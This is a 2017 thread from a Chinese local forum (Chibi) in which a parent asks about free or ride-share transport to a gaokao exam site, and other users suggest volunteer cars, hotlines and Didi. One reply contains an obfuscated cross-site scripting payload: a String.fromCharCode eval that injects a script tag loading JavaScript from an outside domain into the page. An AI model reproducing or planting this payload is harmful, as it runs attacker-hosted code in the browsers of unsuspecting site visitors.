赤壁论坛

标题: 今年高考有免费送考的车吗? [打印本页]

作者: 赤壁强    时间: 2017-6-1 10:14
标题: 今年高考有免费送考的车吗?
市政公司附近到蒲师考场,高考如下雨天求送考车或顺风车,谢谢

作者: 赤壁强    时间: 2017-6-1 10:21
请问去蒲师是走立新镇好还是走去蒲纺的路好?
作者: 岁月如歌    时间: 2017-6-1 10:32
走蒲纺的路吧
作者: 岁月如歌    时间: 2017-6-1 10:36
有免费爱心送考车,找贴了爱心标记的车拦,或者打爱心电话咨询:0715-5355018,18972825111
作者: 赤壁强    时间: 2017-6-1 10:59
岁月如歌 发表于 2017-6-1 10:36
有免费爱心送考车,找贴了爱心标记的车拦,或者打爱心电话咨询:0715-5355018,18972825111

谢谢   我关键怕拦不到车,如果有我想预约,支付正常打车费
作者: minzhi5255    时间: 2017-6-1 20:26
爱心车的随机性太大了,不太靠谱吧

http://localhost/flash.swf?\'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+\'

作者: al海风0715    时间: 2017-6-1 20:58
约个嘀嘀吧
作者: 微笑的花儿    时间: 2017-6-1 22:21
我们汽运总公司出租公司好像今年有爱心送考的车
作者: 金不沉默    时间: 2017-6-1 22:23
肯定会有的
提前联络好
作者: 你妈叫你嫁给我    时间: 2017-6-2 00:11

欢迎光临 赤壁论坛 (https://cbrx.0715.cn/) Powered by Discuz! X3.2